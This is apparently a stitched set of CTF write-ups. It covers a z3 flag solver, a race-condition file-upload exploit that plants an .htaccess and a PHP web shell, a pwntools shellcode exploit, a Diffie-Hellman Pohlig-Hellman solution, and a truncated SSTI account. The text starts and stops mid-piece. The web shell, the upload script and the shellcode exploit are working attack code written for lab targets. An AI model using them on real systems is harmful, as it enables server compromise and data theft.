flag[12]+flag[28]==10374)add_eq(flag[15]-flag[16]^flag[24]==124)add_eq(flag[5]^flag[23]+flag[10]-flag[14]*flag[9]==-2246)add_eq(flag[13]^flag[6]+flag[25]*flag[19]-flag[27]==5111)add_eq(flag[27]*flag[26]^flag[13]-flag[37]*flag[30]==-2088)add_eq(flag[29]-flag[20]*flag[23]^flag[31]==-8756)add_eq(flag[38]*flag[7]^flag[6]*flag[4]==1864)add_eq(flag[1]*flag[13]^flag[20]+flag[3]==7587)add_eq(flag[11]^flag[6]*flag[31]^flag[2]*flag[29]==12727)add_eq(flag[26]^flag[5]+flag[31]-flag[32]==38)add_eq(flag[37]*flag[2]+flag[3]-flag[14]==6431)add_eq(flag[24]^flag[1]*flag[36]+flag[29]==3954)add_eq(flag[26]*flag[14]-flag[2]==4999)add_eq(flag[27]*flag[18]-flag[32]==3983)add_eq(flag[6]*flag[23]+flag[29]*flag[18]+flag[10]==19148)add_eq(flag[34]+flag[13]^flag[0]==16)add_eq(flag[22]+flag[21]-flag[2]==45)add_eq(flag[10]^flag[3]-flag[9]+flag[8]==229)add_eq(flag[7]-flag[31]*flag[1]==-5702)add_eq(flag[1]^flag[14]*flag[27]-flag[21]==2488)add_eq(flag[31]+flag[24]^flag[0]==245)add_eq(flag[8]-flag[27]+flag[11]-flag[33]==23)add_eq(flag[23]*flag[32]+flag[8]^flag[3]==10631)add_eq(flag[6]+flag[25]-flag[22]==101)add_eq(flag[23]+flag[36]^flag[38]+flag[16]^flag[26]==58)add_eq(flag[10]*flag[8]+flag[26]==7228)add_eq(flag[0]+flag[2]-flag[21]==105)add_eq(flag[16]*flag[6]+flag[35]^flag[12]+flag[33]==8786)add_eq(flag[20]*flag[9]+flag[11]==3956)add_eq(flag[8]^flag[31]-flag[2]*flag[13]==-6549)add_eq(flag[35]*flag[12]+flag[19]==11599)add_eq(flag[35]-flag[38]^flag[15]+flag[36]==-152)add_eq(flag[3]*flag[8]-flag[19]==7750)add_eq(flag[37]+flag[12]-flag[27]+flag[22]^flag[19]==246)add_eq(flag[26]^flag[0]+flag[13]*flag[10]-flag[7]==7087)add_eq(flag[0]+flag[28]*flag[18]==9219)add_eq(flag[3]-flag[32]*flag[34]==-4634)add_eq(flag[19]^flag[7]-flag[14]*flag[21]==-4629)add_eq(flag[35]-flag[3]*flag[9]-flag[36]==-5624)add_eq(flag[16]*flag[11]-flag[4]*flag[34]==3717)add_eq(flag[27]*flag[33]+flag[14]==5559)add_eq(flag[30]+flag[15]^flag[6]==141)add_eq(flag[10]*flag[30]-flag[28]+flag[12]==12293)add_eq(flag[22]+flag[10]*flag[8]^flag[20]==7259)add_eq(flag[13]-flag[26]+flag[0]==65)add_eq(flag[10]^flag[31]-flag[32]==-66)add_eq(flag[26]-flag[27]^flag[12]*flag[6]==9897)add_eq(flag[17]+flag[20]^flag[31]*flag[33]==5419)add_eq(flag[26]-flag[38]*flag[27]^flag[36]+flag[17]==-6147)add_eq(flag[14]*flag[9]+flag[18]^flag[17]*flag[32]==10783)add_eq(flag[34]^flag[23]+flag[22]==144)add_eq(flag[37]*flag[7]-flag[38]+flag[14]==6982)add_eq(flag[19]^flag[15]-flag[27]==40)add_eq(flag[8]^flag[12]+flag[37]-flag[22]==41)add_eq(flag[36]*flag[2]^flag[16]==3409)add_eq(flag[19]*flag[25]+flag[1]*flag[26]==16392)add_eq(flag[35]^flag[33]-flag[5]==-123)add_eq(flag[16]*flag[28]+flag[17]^flag[11]+flag[20]==9475)add_eq(flag[34]+flag[9]*flag[29]+flag[26]-flag[0]==4610)add_eq(flag[37]-flag[2]*flag[20]+flag[38]-flag[32]==-7989)add_eq(flag[31]-flag[18]*flag[10]==-8589)add_eq(flag[15]-flag[32]+flag[14]^flag[8]-flag[10]==-109)add_eq(flag[5]^flag[37]-flag[3]+flag[33]==68)add_eq(flag[21]*flag[10]^flag[20]+flag[11]^flag[30]==10402)add_eq(flag[30]-flag[36]^flag[16]==5)add_eq(flag[33]+flag[5]*flag[11]==13100)add_eq(flag[19]-flag[11]*flag[15]==-13236)add_eq(flag[25]-flag[18]^flag[1]+flag[26]==-202)add_eq(flag[25]*flag[7]^flag[32]+flag[15]^flag[4]==5551)add_eq(flag[10]+flag[28]^flag[33]-flag[23]==-224)add_eq(flag[0]*flag[21]+flag[16]*flag[32]^flag[1]==17635)add_eq(flag[26]-flag[27]^flag[29]*flag[24]==9356)add_eq(flag[17]^flag[32]+flag[14]*flag[27]==2773)add_eq(flag[10]-flag[30]^flag[22]==-55)add_eq(flag[13]+flag[16]*flag[34]==4182)add_eq(flag[21]-flag[36]*flag[0]-flag[2]==-3273)add_eq(flag[33]+flag[8]*flag[12]-flag[10]==6270)add_eq(flag[22]+flag[27]*flag[15]-flag[31]==5865)add_eq(flag[23]^flag[29]-flag[4]*flag[3]==-14500)add_eq(flag[3]^flag[30]*flag[18]^flag[12]==9096)add_eq(flag[8]^flag[23]+flag[4]==171)add_eq(flag[32]^flag[30]*flag[8]-flag[25]+flag[10]==7617)add_eq(flag[16]-flag[38]^flag[2]==-78)add_eq(flag[3]^flag[25]*flag[5]+flag[10]==5403)add_eq(flag[14]*flag[16]+flag[0]==4383)add_eq(flag[20]*flag[4]-flag[31]==9789)add_eq(flag[26]+flag[0]^flag[11]*flag[8]==7471)add_eq(flag[9]+flag[3]*flag[26]==11948)add_eq(flag[21]+flag[13]*flag[26]+flag[8]*flag[5]==14087)add_eq(flag[11]^flag[16]+flag[20]-flag[3]+flag[24]==228)add_eq(flag[15]-flag[4]^flag[27]*flag[35]-flag[33]==-6057)add_eq(flag[9]-flag[29]*flag[5]==-10592)add_eq(flag[33]-flag[3]*flag[7]==-13220)add_eq(flag[5]+flag[26]-flag[27]==161)add_eq(flag[5]-flag[37]^flag[1]-flag[24]+flag[25]==14)add_eq(flag[35]^flag[38]*flag[36]==4196)add_eq(flag[3]-flag[22]+flag[10]*flag[16]+flag[34]==9189)add_eq(flag[26]*flag[25]-flag[35]+flag[33]-flag[31]==4736)add_eq(flag[25]-flag[37]+flag[9]-flag[35]*flag[23]==-13277)add_eq(flag[35]+flag[19]^flag[7]+flag[26]==53)add_eq(flag[29]-flag[19]^flag[26]*flag[25]+flag[23]==-4903)add_eq(flag[37]*flag[2]^flag[36]==6394)add_eq(flag[26]-flag[12]*flag[21]==-8925)add_eq(flag[17]+flag[18]*flag[3]^flag[13]+flag[23]==9535)add_eq(flag[17]+flag[12]-flag[1]*flag[28]^flag[7]==-12918)add_eq(flag[0]^flag[21]*flag[28]-flag[11]+flag[29]==10842)add_eq(flag[1]+flag[25]^flag[27]+flag[21]==48)add_eq(flag[0]+flag[36]*flag[21]==3234)add_eq(flag[6]*flag[13]-flag[24]*flag[20]-flag[28]==-1170)add_eq(flag[9]^flag[37]+flag[2]-flag[5]^flag[21]==91)add_eq(flag[8]-flag[10]+flag[6]*flag[16]-flag[7]==8582)add_eq(flag[25]*flag[14]+flag[28]^flag[27]==2609)add_eq(flag[27]*flag[28]^flag[38]==5835)add_eq(flag[10]^flag[5]+flag[36]^flag[37]+flag[22]==143)add_eq(flag[29]-flag[10]*flag[37]^flag[4]+flag[36]==-6825)add_eq(flag[6]^flag[31]+flag[1]-flag[0]==42)add_eq(flag[17]+flag[28]*flag[21]+flag[11]^flag[24]==11074)add_eq(flag[24]+flag[10]*flag[8]==7227)add_eq(flag[20]*flag[35]+flag[4]^flag[13]+flag[37]==9930)add_eq(flag[23]^flag[5]*flag[28]^flag[25]==12734)add_eq(flag[13]+flag[29]*flag[0]^flag[33]==9363)add_eq(flag[19]+flag[26]^flag[35]+flag[20]^flag[5]==117)add_eq(flag[19]-flag[26]*flag[35]-flag[16]==-12080)add_eq(flag[31]+flag[37]-flag[3]+flag[25]^flag[13]==105)add_eq(flag[16]^flag[24]*flag[31]^flag[32]==5004)add_eq(flag[33]-flag[35]+flag[14]==38)add_eq(flag[18]^flag[29]-flag[36]==110)add_eq(flag[35]^flag[15]*flag[16]-flag[32]^flag[17]==9597)add_eq(flag[24]^flag[38]-flag[22]*flag[4]==-6241)add_eq(flag[30]+flag[31]-flag[36]==132)add_eq(flag[11]^flag[4]-flag[3]+flag[26]*flag[13]==6584)add_eq(flag[7]-flag[30]+flag[37]*flag[27]-flag[4]==3088)add_eq(flag[37]+flag[3]-flag[30]==68)add_eq(flag[23]+flag[10]-flag[20]+flag[15]-flag[7]==141)add_eq(flag[12]-flag[3]*flag[31]+flag[5]*flag[29]==4666)add_eq(flag[37]*flag[16]+flag[3]*flag[7]==18620)add_eq(flag[38]+flag[7]-flag[17]+flag[13]==208)add_eq(flag[38]*flag[11]-flag[26]^flag[32]+flag[36]==14530)add_eq(flag[29]+flag[9]-flag[7]==31)add_eq(flag[30]+flag[3]*flag[31]^flag[38]*flag[34]==4042)add_eq(flag[3]-flag[8]^flag[9]-flag[21]+flag[4]==121)add_eq(flag[31]^flag[3]+flag[14]^flag[16]-flag[20]==157)add_eq(flag[2]-flag[9]*flag[37]==-2923)add_eq(flag[1]-flag[37]^flag[8]*flag[10]-flag[23]==7001)add_eq(flag[19]-flag[31]^flag[10]*flag[32]^flag[36]==10488)add_eq(flag[0]^flag[38]+flag[24]-flag[30]+flag[23]==191)add_eq(flag[9]-flag[29]^flag[0]-flag[2]^flag[5]==95)add_eq(flag[33]-flag[23]+flag[35]==119)add_eq(flag[2]^flag[5]+flag[25]*flag[13]==3253)add_eq(flag[7]*flag[30]^flag[28]-flag[14]==12767)add_eq(flag[7]^flag[15]*flag[38]==14423)add_eq(flag[26]+flag[9]^flag[25]*flag[29]-flag[22]==4361)add_eq(flag[31]*flag[25]-flag[38]==2323)add_eq(flag[31]^flag[35]*flag[1]-flag[38]+flag[6]==13822)add_eq(flag[33]+flag[35]-flag[29]+flag[4]^flag[6]==361)add_eq(flag[26]-flag[33]^flag[6]+flag[11]-flag[7]==-108)add_eq(flag[17]-flag[0]^flag[33]-flag[10]==-4)add_eq(flag[26]+flag[14]^flag[35]*flag[32]==11598)add_eq(flag[24]^flag[1]+flag[26]-flag[23]==11)add_eq(flag[38]+flag[28]-flag[25]^flag[4]==196)add_eq(flag[4]*flag[0]^flag[3]+flag[2]==12109)add_eq(flag[29]*flag[33]^flag[10]*flag[8]==13260)add_eq(flag[24]^flag[37]+flag[8]-flag[18]==82)add_eq(flag[8]*flag[27]^flag[38]==3419)add_eq(flag[26]*flag[4]^flag[38]==12401)add_eq(flag[22]+flag[19]^flag[13]-flag[12]==-136)add_eq(flag[15]^flag[5]-flag[28]+flag[34]*flag[35]==5972)add_eq(flag[13]+flag[37]-flag[20]*flag[16]+flag[27]==-6540)add_eq(flag[6]-flag[28]^flag[38]*flag[29]==-11883)add_eq(flag[35]-flag[1]*flag[11]^flag[34]==-13088)add_eq(flag[34]*flag[14]-flag[25]==2451)add_eq(flag[19]-flag[24]+flag[38]^flag[6]==234)add_eq(flag[32]-flag[31]+flag[35]^flag[37]==152)add_eq(flag[33]^flag[23]-flag[15]*flag[29]-flag[34]==-10756)add_eq(flag[7]-flag[16]^flag[6]*flag[17]^flag[31]==9911)add_eq(flag[19]-flag[5]+flag[32]==89)add_eq(flag[20]-flag[27]+flag[18]*flag[31]^flag[37]==4146)add_eq(flag[9]-flag[4]^flag[37]-flag[28]==120)add_eq(flag[0]*flag[11]-flag[37]*flag[9]+flag[23]==8570)add_eq(flag[36]*flag[30]+flag[0]^flag[4]==3950)add_eq(flag[28]*flag[24]-flag[35]^flag[32]==11260)add_eq(flag[33]+flag[25]^flag[36]-flag[1]==-205)add_eq(flag[35]-flag[7]^flag[30]==123)add_eq(flag[24]*flag[29]^flag[16]+flag[10]==9341)add_eq(flag[32]*flag[3]-flag[24]==11444)add_eq(flag[27]*flag[31]^flag[2]==2636)add_eq(flag[1]*flag[38]-flag[15]*flag[14]==8385)add_eq(flag[28]+flag[1]*flag[25]-flag[11]*flag[0]==-5898)add_eq(flag[30]+flag[13]^flag[35]==205)add_eq(flag[27]-flag[21]^flag[25]+flag[28]==-138)add_eq(flag[27]*flag[3]^flag[24]+flag[2]^flag[6]==5909)add_eq(flag[1]*flag[10]^flag[23]==12406)add_eq(flag[15]^flag[34]-flag[12]*flag[23]+flag[29]==-10291)add_eq(flag[36]-flag[31]+flag[6]==86)add_eq(flag[20]^flag[28]-flag[17]*flag[34]^flag[14]==-4576)add_eq(flag[12]*flag[30]^flag[23]+flag[2]==10909)add_eq(flag[4]*flag[7]^flag[0]==13747)add_eq(flag[15]^flag[25]*flag[22]==2531)add_eq(flag[13]-flag[24]^flag[34]==-18)add_eq(flag[17]^flag[18]-flag[31]==66)add_eq(flag[6]^flag[23]*flag[32]+flag[30]-flag[24]==10709)add_eq(flag[0]+flag[4]*flag[25]-flag[24]^flag[7]==5984)add_eq(flag[21]+flag[38]*flag[24]^flag[20]==12518)add_eq(flag[16]+flag[20]*flag[6]-flag[2]==8303)add_eq(flag[21]^flag[24]*flag[30]-flag[16]==11165)add_eq(flag[28]*flag[13]+flag[15]==7639)add_eq(flag[1]*flag[28]-flag[11]^flag[3]==12839)add_eq(flag[28]-flag[11]*flag[19]+flag[35]*flag[29]==-455)add_eq(flag[29]+flag[24]*flag[23]-flag[3]==10866)add_eq(flag[25]-flag[5]^flag[29]==-97)add_eq(flag[19]+flag[9]*flag[24]-flag[17]==4761)add_eq(flag[12]+flag[5]*flag[1]^flag[27]-flag[20]==-12836)add_eq(flag[30]^flag[32]*flag[38]-flag[16]^flag[28]==12041)add_eq(flag[19]-flag[13]^flag[35]-flag[0]+flag[38]==181)add_eq(flag[34]^flag[13]+flag[29]==144)add_eq(flag[9]^flag[8]-flag[22]+flag[29]==94)add_eq(flag[13]+flag[2]-flag[4]==44)add_eq(flag[4]-flag[7]^flag[14]+flag[38]*flag[3]==14917)add_eq(flag[35]*flag[33]^flag[29]-flag[18]==13059)add_eq(flag[14]^flag[0]-flag[25]^flag[27]-flag[35]==-70)add_eq(flag[6]*flag[31]-flag[21]==5209)add_eq(flag[12]^flag[13]+flag[4]*flag[0]+flag[27]==12377)add_eq(flag[0]+flag[9]*flag[17]-flag[35]+flag[33]==4646)add_eq(flag[15]+flag[11]^flag[22]+flag[31]^flag[0]==226)add_eq(flag[25]-flag[7]^flag[35]==-71)add_eq(flag[2]^flag[31]+flag[11]-flag[6]^flag[1]==40)add_eq(flag[23]^flag[38]-flag[19]==123)add_eq(flag[23]^flag[16]-flag[1]*flag[24]^flag[17]==-11249)add_eq(flag[6]-flag[36]+flag[11]^flag[16]==239)add_eq(flag[5]-flag[4]*flag[20]^flag[32]==-9631)add_eq(flag[4]-flag[29]*flag[32]^flag[28]==-9202)add_eq(flag[30]-flag[14]^flag[24]-flag[18]==44)add_eq(flag[17]+flag[38]*flag[34]^flag[3]==6203)add_eq(flag[30]+flag[19]*flag[14]==5418)add_eq(flag[20]^flag[6]+flag[2]==157)add_eq(flag[24]^flag[13]-flag[14]==108)add_eq(flag[36]-flag[30]+flag[38]==44)add_eq(flag[38]+flag[20]^flag[2]+flag[17]*flag[34]==4697)add_eq(flag[34]^flag[28]-flag[23]*flag[35]+flag[19]==-13075)add_eq(flag[17]^flag[19]+flag[15]==132)add_eq(flag[18]+flag[14]*flag[20]==4160)add_eq(flag[12]-flag[8]*flag[5]==-7297)add_eq(flag[21]-flag[14]*flag[23]==-5515)add_eq(flag[34]*flag[22]+flag[32]-flag[12]==2501)add_eq(flag[12]+flag[8]*flag[30]+flag[23]*flag[21]==18069)add_eq(flag[9]*flag[4]+flag[7]^flag[20]+flag[14]==5891)add_eq(flag[14]*flag[7]-flag[32]+flag[4]==5738)add_eq(flag[2]-flag[36]*flag[18]^flag[19]==-2435)add_eq(flag[7]*flag[34]+flag[11]==5604)add_eq(flag[33]*flag[27]+flag[17]==5603)add_eq(flag[18]+flag[14]^flag[36]-flag[17]==-191)add_eq(flag[4]-flag[36]+flag[22]*flag[1]+flag[9]==5952)add_eq(flag[4]^flag[38]-flag[34]+flag[28]*flag[5]==12887)add_eq(flag[8]-flag[33]*flag[19]+flag[30]-flag[12]==-11147)add_eq(flag[19]+flag[36]^flag[6]*flag[9]==4873)add_eq(flag[22]*flag[5]^flag[32]*flag[20]-flag[12]==2977)add_eq(flag[13]-flag[11]*flag[24]+flag[5]==-11306)add_eq(flag[23]*flag[11]+flag[34]^flag[12]==12886)add_eq(flag[34]-flag[18]+flag[15]*flag[23]-flag[9]==12571)add_eq(flag[15]-flag[2]*flag[11]-flag[7]==-11713)add_eq(flag[6]+flag[24]*flag[5]^flag[13]*flag[32]==12986)add_eq(flag[30]*flag[11]^flag[22]-flag[33]+flag[8]==13217)add_eq(flag[32]+flag[22]*flag[13]-flag[11]+flag[33]==3455)add_eq(flag[30]-flag[17]+flag[33]-flag[22]==76)add_eq(flag[15]+flag[21]^flag[34]*flag[32]==4675)add_eq(flag[12]-flag[23]*flag[11]==-12665)add_eq(flag[34]-flag[7]*flag[20]+flag[9]*flag[30]==-3439)add_eq(flag[20]*flag[1]-flag[4]+flag[18]==9077)add_eq(flag[17]+flag[19]*flag[36]==3527)add_eq(flag[22]^flag[15]*flag[18]==9155)add_eq(flag[6]^flag[15]*flag[12]==10949)add_eq(flag[15]*flag[20]+flag[5]-flag[24]==9213)add_eq(flag[6]+flag[7]*flag[15]-flag[19]==12880)add_eq(flag[7]+flag[17]-flag[1]*flag[13]+flag[15]==-7202)add_eq(flag[13]-flag[17]+flag[12]^flag[22]==113)add_eq(flag[15]+flag[24]^flag[7]-flag[28]==-216)add_eq(flag[5]^flag[17]-flag[33]==-125)add_eq(flag[12]^flag[18]*flag[6]==8415)add_eq(flag[5]^flag[33]+flag[22]==239)add_eq(flag[4]^flag[8]-flag[2]*flag[30]+flag[5]==-11325)add_eq(flag[20]*flag[34]+flag[12]==4015)add_eq(flag[30]^flag[18]-flag[19]+flag[6]==34)add_eq(flag[30]*flag[8]+flag[9]*flag[17]==12084)add_eq(flag[30]-flag[20]*flag[19]^flag[6]==-8294)add_eq(flag[5]-flag[34]*flag[12]==-4543)add_eq(flag[22]-flag[2]^flag[21]-flag[7]==33)add_eq(flag[18]*flag[34]-flag[8]+flag[21]*flag[6]==13734)add_eq(flag[2]-flag[34]^flag[21]+flag[8]==149)add_eq(flag[6]-flag[36]*flag[12]==-3031)add_eq(flag[15]*flag[30]-flag[12]==13015)add_eq(flag[17]+flag[4]*flag[12]==11780)add_eq(flag[30]-flag[18]*flag[1]==-9006)add_eq(flag[36]*flag[12]-flag[1]==3021)add_eq(flag[15]^flag[18]-flag[1]^flag[5]*flag[8]==-7347)add_eq(flag[18]^flag[9]-flag[36]==95)add_eq(flag[18]+flag[22]*flag[4]^flag[36]==6384)add_eq(flag[33]^flag[15]+flag[7]-flag[34]+flag[8]==152)add_eq(flag[1]*flag[33]+flag[22]*flag[17]==17157)add_eq(flag[17]^flag[1]-flag[2]==82)add_eq(flag[17]^flag[33]-flag[18]==67)add_eq(flag[1]*flag[15]-flag[17]==13015)add_eq(flag[34]-flag[2]^flag[22]+flag[18]==-177)add_eq(flag[1]+flag[2]*flag[33]==11022)add_eq(flag[2]==101) i = 0start_time = time.time()if s.check() == sat: # https://stackoverflow.com/questions/13395391/z3-finding-all-satisfying-models founded = prepare_founded_values() # return founded values as array print ''.join( chr(j) for j in founded ) # print flag as string iterate_all() # prepare to next iteration, anticollision i += 1print('--- %.2f second(s) && %d answer(s) ---' % ((time.time() - start_time), i) )```Running the script should output the flag. ```$ python2 check.py crew{phpB0lt_B3sT_PhP_3nc0d3r_r3al1y!?}--- 0.02 second(s) && 1 answer(s) ---``` # Uploadz (Web) I think this site safe from upload file, prove me wrong please. Uploadz was a decent web challenge, with a source code provided with it, meaning guessing/bruteforcing aren't part of the challenge. ```php <form action="/" method="post" enctype="multipart/form-data">Select image to upload: <input type="file" name="uploadedFile" id="fileToUpload"> <input type="submit" value="Upload Image" name="submit"> </form>``` A simple static analysis against the code shows that there's room for a race condition, since our file is being uploaded as is on the temp folder, it then takes one second for us to access the file, it's being deleted using **unlink** afterwards. To tackle this, we obviously need a script, then its all a matter of planning a successful attack to achieve an RCE. One problem I've had was that PHP wasn't executable, so I decided to a upload two files:1- an .htaccess file that allows as to execute php code with another exension (jpg).2- upload a JPG file that has a php code (a one liner cmd in this case). ```pythonimport requestsimport reimport urllib3import threadingimport timeimport sys urllib3.disable_warnings()file = ".htaccess"file2 = "test.jpg"path = "storage/app/temp/"files = { 'uploadedFile': (file, "AddType application/x-httpd-php .jpg", 'text/plain')}files2 = { 'uploadedFile': (file2, """"; $cmd = ($_REQUEST['cmd']); system($cmd); echo ""; die; }?>""", 'text/plain')}values = {'submit': 'Upload Image'}url = "https://uploadz-web.crewctf-2022.crewc.tf/" def performReqs(uploadedFile): r = requests.post(url, files=uploadedFile,proxies={"https":"http://127.0.0.1:1337"},verify=False,data=values) filename = re.search("your file in (.*)<",r.text) cmd = sys.argv[1] t1 = threading.Thread(target=performReqs, args=(files,)) t2 = threading.Thread(target=performReqs, args=(files2,)) t2.start()t1.start() r2 = requests.get(url+path+"test.jpg?cmd={}".format(cmd), verify=False,proxies={"https":"http://127.0.0.1:1337"})print(r2.text)``` Running the script should provide the flag. ```$ python3 slv.py "cat /flag.txt"crewctf{upload_rce_via_race}``` # Wiznu (PWN) Winzu was an easy binary exploitation challenge, however, there were limitations to use certain functions using **seccomp**, NX is disabled, so we can inject shellcode. ```Cint init(EVP_PKEY_CTX *ctx) { int iVar1; undefined8 uVar2; uVar2 = seccomp_init(0); seccomp_rule_add(uVar2,0x7fff0000,2,0); seccomp_rule_add(uVar2,0x7fff0000,0,0); seccomp_rule_add(uVar2,0x7fff0000,1,0); iVar1 = seccomp_load(uVar2); return iVar1;}```I validated using seccomp-tools.```└─# seccomp-tools dump ./chall1 130 ⨯ line CODE JT JF K================================= 0000: 0x20 0x00 0x00 0x00000004 A = arch 0001: 0x15 0x00 0x07 0xc000003e if (A != ARCH_X86_64) goto 0009 0002: 0x20 0x00 0x00 0x00000000 A = sys_number 0003: 0x35 0x00 0x01 0x40000000 if (A < 0x40000000) goto 0005 0004: 0x15 0x00 0x04 0xffffffff if (A != 0xffffffff) goto 0009 0005: 0x15 0x02 0x00 0x00000000 if (A == read) goto 0008 0006: 0x15 0x01 0x00 0x00000001 if (A == write) goto 0008 0007: 0x15 0x00 0x01 0x00000002 if (A != open) goto 0009 0008: 0x06 0x00 0x00 0x7fff0000 return ALLOW 0009: 0x06 0x00 0x00 0x00000000 return KILL``` Finally, I came up with a script that uses a custom shellcode to read the flag. ```python from pwn import * binary = context.binary = ELF('./chall1') # Allows you to switch between local/GDB/remote from terminaldef start(argv=[], *a, **kw): if args.GDB: # Set GDBscript below return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw) elif args.REMOTE: # ('server', 'port') return remote(sys.argv[1], sys.argv[2], *a, **kw) else: # Run locally return process([exe] + argv, *a, **kw)def find_ip(payload): p = process(exe) p.sendline(payload) # Cyclic pattern # Wait for the process to crash p.wait() # Print out the address of EIP/RIP at the time of crashing # ip_offset = cyclic_find(p.corefile.pc) # x86 ip_offset = cyclic_find(p.corefile.read(p.corefile.sp, 4)) # x64 info('located EIP/RIP offset at {a}'.format(a=ip_offset)) return ip_offset# Specify your GDB script here for debugginggdbscript = '''init-pwndbgcontinue'''.format(**locals())# Set up pwntools for the correct architectureexe = './chall1'# This will automatically get context arch, bits, os etcelf = context.binary = ELF(exe, checksec=False)# Enable verbose logging so we can see exactly what is being sent (info/debug)context.log_level = 'debug' # ===========================================================# EXPLOIT GOES HERE# =========================================================== # Pass in pattern_size, get back EIP/RIP offsetoffset = find_ip(cyclic(500))context.arch = 'amd64'shellcode = asm( shellcraft.pushstr( "/home/ctf/flag" ) + shellcraft.open( 'rsp' , 0 , 0 ) + shellcraft.read( 'rax' , 'rsp' , 0x100 ) + shellcraft.write( 1 , 'rsp' , 0x100 ))# Start program#io = start()io = remote("wiznu.crewctf-2022.crewc.tf",1337)io.recvuntil('Special Gift for Special Person : ')_ = io.recvline().strip()stack = int(_,16)log.info('stack: ' + hex(stack))# Pad shellcode with NOPs until we get to return addresspadding = b'\x90' * (offset - len(shellcode)) # Build the payloadpayload = flat([ shellcode, padding, stack])io.sendline(payload)io.interactive()``` Running the script outputs the contents of /home/ctf/flag.```bash> [DEBUG] Received 0x100 bytes: 00000000 63 72 65 77 7b 4f 52 57 5f 63 6f 6d 65 5f 74 6f │crew│{ORW│_com│e_to│ 00000010 5f 74 68 65 5f 72 65 73 63 75 65 5f 73 74 34 72 │_the│_res│cue_│st4r│ 00000020 6e 5f 68 33 72 33 21 7d 30 0a 81 ed df 55 00 00 │n_h3│r3!}│0···│·U··│ 00000030 b0 0a 81 ed df 55 00 00 15 4e b7 59 0e 2d 8f db │····│·U··│·N·Y│·-··│ 00000040 40 08 81 ed df 55 00 00 60 fe 21 0c fe 7f 00 00 │@···│·U··│`·!·│····│ 00000050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ 00000060 15 4e b7 a2 4d 35 73 24 15 4e 79 39 48 05 a4 25 │·N··│M5s$│·Ny9│H··%│ 00000070 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ 00000080 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 │····│····│····│····│ 00000090 68 fe 21 0c fe 7f 00 00 78 fe 21 0c fe 7f 00 00 │h·!·│····│x·!·│····│ 000000a0 90 61 45 94 15 7f 00 00 00 00 00 00 00 00 00 00 │·aE·│····│····│····│ 000000b0 00 00 00 00 00 00 00 00 40 08 81 ed df 55 00 00 │····│····│@···│·U··│ 000000c0 60 fe 21 0c fe 7f 00 00 00 00 00 00 00 00 00 00 │`·!·│····│····│····│ 000000d0 00 00 00 00 00 00 00 00 6a 08 81 ed df 55 00 00 │····│····│j···│·U··│ 000000e0 58 fe 21 0c fe 7f 00 00 1c 00 00 00 00 00 00 00 │X·!·│····│····│····│ 000000f0 01 00 00 00 00 00 00 00 d8 0f 22 0c fe 7f 00 00 │····│····│··"·│····│ 00000100crew{ORW_come_to_the_rescue_st4rn_h3r3!}0```
## NSA Backdoor (500 pts) > I heard someone has been sneakily installing backdoors in open-source implementations of Diffie-Hellman... I wonder who it could be... ;)>> - gen.py> - output.txt The script uses the same prime generation functions as the one from **Very Smooth** problem. But, unlike that problem, the `c` here uses the flag as the exponent instead of the base, and there is no `e` that is coprime with `p-1` and `n-1`. Also, this is a bad Diffie-Hellman implementation because the modulus `n` is not a prime. This is the [backdoor](https://www.cryptologie.net/article/360/how-to-backdoor-diffie-hellman-quick-explanation/) of the implementation. ```textn = d63c7cb032ae4d3a43ecec4999cfa8f8b49aa9c14374e60f3beeb437233e44f988a73101f9b20ffb56454350b1c9032c136142220ded059876ccfde992551db46c27f122cacdd38c86acb844032f8600515aa6ccb7a1d1ac62d04b51b752476d2d6ee9f22d0f933bebdd833a71fd30510479fcc7ba0afb1d4b0a1622cdc2a48341010dffdcfc8d9af45959fb30b692dc2c9e181ac6bcd6a701326e3707fb19b7f9dfe1c522c68f9b0d229d384be1e1c58f72f8df60ca5172a341a7ee81428a064beedd6af7b89cc6079f2b6d3717f0d29330f0a70acca05bf67ab60c2e5cb0b86bfca2c9b8d50d79d24371432a1efb243f3c5f15b377ccc51f6e69bfbf5ecc61c = 51099773fd2aafd5f84dfe649acbb3558797f58bdc643ac6ee6f0a6fa30031767966316201c36be69241d9d05d0bd181ced13809f57b0c0594f6b29ac74bc7906dae70a2808799feddc71cf5b28401100e5e7e0324b9d8b56e540c725fa4ef87b9e8d0f901630da5f7f181f6d5b4cdc00d5f5c3457674abcb0d0c173f381b92bdfb143c595f024b98b9900410d502c87dfc1633796d640cb5f780fa4b6f0414fb51e34700d9096caf07b36f4dcd3bb5a2d126f60d3a802959d6fadf18f4970756f3099e14fa6386513fb8e6cdda80fdc1c32a10f6cdb197857caf1d7abf3812e3d9dcda106fa87bac382d3e6fc216c55da02a0c45a482550acb2f58bea2cfa03``` The `c` was calculated as `3 ^ flag mod n`. So `g` in this Diffie-Hellman exchange is 3.What I need to do first is to set `d` and `e` such that `d = 5 ^ e mod n` Since `n` is not a prime number, I needed to make use of [Pohlig-Hellman algorithm](https://risencrypto.github.io/PohligHellman/) to recover the flag. After numerous trials, I got the [script](https://github.com/leeyonjae/CTF_writeups/blob/main/picoCTF2022/solutions/nsa-backdoor.py) to solve this problem. 1. Since `n = p * q`, I found the Pohlig-Hellman values for `p` and `q`.2. Then I reduced the latter to the remainder of dividing by `(q - 1) / 2`.3. I used the [Chinese Remainder Theorem](https://brilliant.org/wiki/chinese-remainder-theorem/) to calculate the value of the flag.4. Finally, I decoded the hexadecimal form of the flag to ASCII string. **Flag: `picoCTF{1ca93858}`**
The challenge during VishwaCTF 2022 was to send a request in which the target user was to introduce himself by name. In this challenge, we were initially greeted with a window where after a typical XSS attack `<script>alert("123")</script>`, the author knew that this page was vulnerable. The attack was of course successful, but it was a path to nowhere. The author tried a lot of Server Side Template Injection. In the next step, the author proceeded to googling and started searching the internet for clues. After a quick look at the source code, the author realized that the website was put up on the Flask framework in Python. With this knowledge, he was able to list the files on the server. It was also possible to run commands common to Linux systems. Everything was simple until the author wanted to display Flask. With the `cat` command, a space had to be used so that the `flag.txt` argument could be specified. The space in the URL and the encoding did not work. The key to solving the space not being read was to use `$IFS`. The IFS is an acronym for Internal Field Separator or Input Field Separator. The $IFS is a special shell variable in Bash, ksh, sh, and POSIX. With this knowledge, the author began testing the various payloads that he wanted to send with the browser request. The exploit used the built-in `open` object to open the file. Thanks to the `ls` command used earlier, the author knew that the flag was in the same directory. The final exploit that the author designed looked something like 